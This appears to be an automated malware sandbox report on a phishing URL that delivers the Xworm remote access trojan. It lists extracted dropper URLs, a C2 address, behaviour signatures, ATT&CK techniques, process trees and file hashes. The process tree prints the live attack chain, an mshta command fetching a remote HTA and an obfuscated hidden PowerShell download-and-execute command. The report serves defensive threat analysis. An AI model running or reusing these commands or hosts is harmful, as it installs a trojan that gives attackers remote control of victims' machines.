xworm | hxxps://rewiewe-cheksdin[.]com/?__cf_chl_tk=0nE7XstTWtNOBCB9IQMqGid8fjmvUaoKVVXpiHS3BWY-1740668179-1[.]0[.]1[.]1-GnzoQ_xYIVs4SLz0xWsEytSBU4JtB_aR79Cj_4[.]FVW4

Analysis

max time kernel
294s
max time network
302s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
01/03/2025, 03:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://rewiewe-cheksdin.com/?__cf_chl_tk=0nE7XstTWtNOBCB9IQMqGid8fjmvUaoKVVXpiHS3BWY-1740668179-1.0.1.1-GnzoQ_xYIVs4SLz0xWsEytSBU4JtB_aR79Cj_4.FVW4

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://x10mrn-point.cfd/aFl9hO96KP2qAaSr.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.7.214.211/a.mp4

Extracted

Family

xworm

Version

5.0

185.7.214.211:4444

aes.plain

Signatures

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral2/files/0x0003000000022acd-247.dat	family_xworm
behavioral2/memory/4824-248-0x000001FE63B30000-0x000001FE63B40000-memory.dmp	family_xworm
behavioral2/memory/324-250-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
135	4624	mshta.exe
137	4624	mshta.exe
140	4824	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4824	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	mshta.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4824 set thread context of 324	4824	powershell.exe	136

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133852751803803226"	chrome.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
3896	chrome.exe
3896	chrome.exe
4824	powershell.exe
4824	powershell.exe
4824	powershell.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3896 wrote to memory of 1224	3896	chrome.exe	84
PID 3896 wrote to memory of 1224	3896	chrome.exe	84
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 5108	3896	chrome.exe	86
PID 3896 wrote to memory of 1268	3896	chrome.exe	87
PID 3896 wrote to memory of 1268	3896	chrome.exe	87
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88
PID 3896 wrote to memory of 1060	3896	chrome.exe	88

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://rewiewe-cheksdin.com/?__cf_chl_tk=0nE7XstTWtNOBCB9IQMqGid8fjmvUaoKVVXpiHS3BWY-1740668179-1.0.1.1-GnzoQ_xYIVs4SLz0xWsEytSBU4JtB_aR79Cj_4.FVW4
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc0c40cc40,0x7ffc0c40cc4c,0x7ffc0c40cc58
  2⤵
  PID:1224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1912 /prefetch:2
  2⤵
  PID:5108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1700 /prefetch:3
  2⤵
  PID:1268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2224 /prefetch:8
  2⤵
  PID:1060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:2848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3204 /prefetch:1
  2⤵
  PID:3104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4852,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4864 /prefetch:8
  2⤵
  PID:3076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4880,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4352 /prefetch:1
  2⤵
  PID:392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4608,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5016 /prefetch:1
  2⤵
  PID:3916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5144,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5148 /prefetch:8
  2⤵
  PID:4668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5288,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4616 /prefetch:8
  2⤵
  PID:400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5164,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5312 /prefetch:8
  2⤵
  PID:1936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5448,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5456 /prefetch:8
  2⤵
  PID:312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4864,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5584 /prefetch:1
  2⤵
  PID:1604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5364,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3688 /prefetch:1
  2⤵
  PID:448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4620,i,15624878151554221687,8729963959231159892,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5084 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4604

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4188

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://x10mrn-point.cfd/aFl9hO96KP2qAaSr.html #'' I'm human ID158409''
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:4624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$A1='ject Net.WebCli';$B2='loadString(''http://185.7.214.211/a.mp4'')';$C3='ent).Down';$D4='(New-Ob';$E5=IEX ($D4,$A1,$C3,$B2 -Join '')|IEX"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:4824
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s1plahhk\s1plahhk.cmdline"
    3⤵
    PID:2964
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8236.tmp" "c:\Users\Admin\AppData\Local\Temp\s1plahhk\CSC854BC1905FE447A3B47E5D9BF2734D87.TMP"
      4⤵
      PID:3216
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x10mrn-point.cfd/aFl9hO96KP2qAaSr.htm
1⤵
PID:1372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc0bc446f8,0x7ffc0bc44708,0x7ffc0bc44718
  2⤵
  PID:1576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,2809358043240248831,3974249144317354563,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2
  2⤵
  PID:656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,2809358043240248831,3974249144317354563,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2592 /prefetch:3
  2⤵
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,2809358043240248831,3974249144317354563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
  2⤵
  PID:2620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2809358043240248831,3974249144317354563,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
  2⤵
  PID:3420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2809358043240248831,3974249144317354563,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:1888

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4440

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
c9be626e9715952e9b70f92f912b9787

SHA1
aa2e946d9ad9027172d0d321917942b7562d6abe

SHA256
c13e8d22800c200915f87f71c31185053e4e60ca25de2e41e160e09cd2d815d4

SHA512
7581b7c593785380e9db3ae760af85c1a889f607a3cd2aa5a2695a0e5a0fe8ee751578e88f7d8c997faeda804e2fc2655d859bee2832eace526ed4379edaa3f5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
45e679e05af30d595e00ed19ebec1974

SHA1
2dd3310898a4a5d0a171c6f0eb86e44ea08bff5f

SHA256
6b25ba679c6977472f3df36f0a55c2b8a3cde68ffe45d6c68fafd5c39ecd053d

SHA512
9f7a8e08af9f91dfbe674e9f4ad34dff5690b129d421f553b242b49f1021d8f1d0b95a6dbfbfd1fbdc44811214f6c96c5aa7ad9df1d7d8b232e035b40050c456

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
b4345f6f59ab3b099742e11f54a80a55

SHA1
86087297659466e62f85b8255da33f5284be2f34

SHA256
ac9fce527efe55680860ed42465bf36692e3f0c7cca3a8874b1c2ab6c9291dbc

SHA512
68163addc15a5eff590ebc03380aa4366032d6fdb31797e6dca7504e273980326282b6fdc2cea68ce0b1d1c4848783467717345b208393b8b3da15fbe1bbc9ae

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
1da6f91a40d7dd96a9790b4fff0134cb

SHA1
1b6dbd588f449cac994bc861d0d085bf100ecc1b

SHA256
4b4326c04867024e49c9547816d700981eb9da0701c3aafa6ef7080e0cbc7aab

SHA512
0f7ddda4f83d37a06705f1afed18e41636e87b87f1e782ad43afe0aa4e96f88679e19f488153e60174ce0bf7d2c5f64dcd528d537a0e5a6414c318c98119e785

Download Submit
